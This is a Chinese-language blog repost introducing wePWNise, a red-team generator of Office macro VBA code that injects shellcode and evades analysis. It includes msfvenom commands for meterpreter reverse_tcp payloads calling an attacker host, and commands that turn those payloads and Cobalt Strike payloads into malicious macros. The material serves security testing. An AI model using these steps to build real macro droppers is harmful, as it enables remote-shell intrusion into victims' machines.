wePWNise:一款功能强大的红队Office宏VBA代码生成工具
码农的梦想
2024-05-10 08:45
关于wePWNise
wePWNise是一款功能强大的Office宏VBA代码生成工具,该工具基于纯Python开发,可以帮助广大研究人员生成用于Office宏或模版的VBA代码,并以此来测试目标Office环境、应用程序控制和防护机制的安全性。
wePWNise的设计理念将自动化和集成考虑在内,能够以锁定的环境场景为目标。wePWNise能够枚举目标环境的软件限制策略(SRP)和EMET缓解措施,并支持动态识别要将注入Payload的安全二进制文件。除此之外,wePWNise还集成了现有的开发框架(例如metasploit、Cobalt Strike),并接受原始格式的任何定制Payload,以供红队研究人员使用。
工具运行流程
工具要求
Python termcolor包
安装命令如下:
pip install termcolor工具下载
由于该工具基于Python 2开发,因此我们首先需要在本地设备上安装并配置好Python 2.7版本环境。
接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/FSecureLABS/wePWNise.git命令行参数
usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]
[--out <output_file>] [--msgbox] [--msg <window_message>]
optional arguments:
-h, --help 显示工具帮助信息和退出
-i86 <x86_shellcode> 输入x86原始shellcode
-i64 <x64_shellcode> 输入x64原始shellcode
--inject64 注入64位Payload,注入x86时设置为False,默认为True
--out <output_file> 输出VBA宏的文件路径
--msgbox 显示消息框以防止自动化分析,默认为True
--msg <window_message> --msgbox设置为True时,需要显示的自定义提示消息工具使用样例
metasploit Payload
首先,生成适用于x86和x64架构的原始格式Payload,并确保metasploit监听器配置正确:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw然后将wePWNise指向生成的Payload,并将输出结果存储至msf_wepwn.txt:
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txtCobalt Strike Payload
按照下列路径点击菜单,并在Cobalt Strike中生成原始Payload,然后重复该操作并勾选x64勾选框以生成64位Payload:
Attacks > Packages > Payload Generator
然后将生成的Payload传递给wePWNise并生成VBA代码:
$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt自定义Payload
在某些特定场景下,我们可能只能拿到x86 Payload,而wePWNise需要32位和64位两种架构的Payload,为了禁用64位注入功能,我们可以创建一个虚假的64位文件,然后将--inject64参数设置为False:
$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt类似的,如果你只想要生成64位的Payload,可以创建一个虚假的x86文件,然后通过-i86命令行参数提供给wePWNise。
许可证协议
本项目的开发与发布遵循BSD-3-Clause开源许可证协议。
项目地址
wePWNise:【GitHub传送门】
参考资料
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
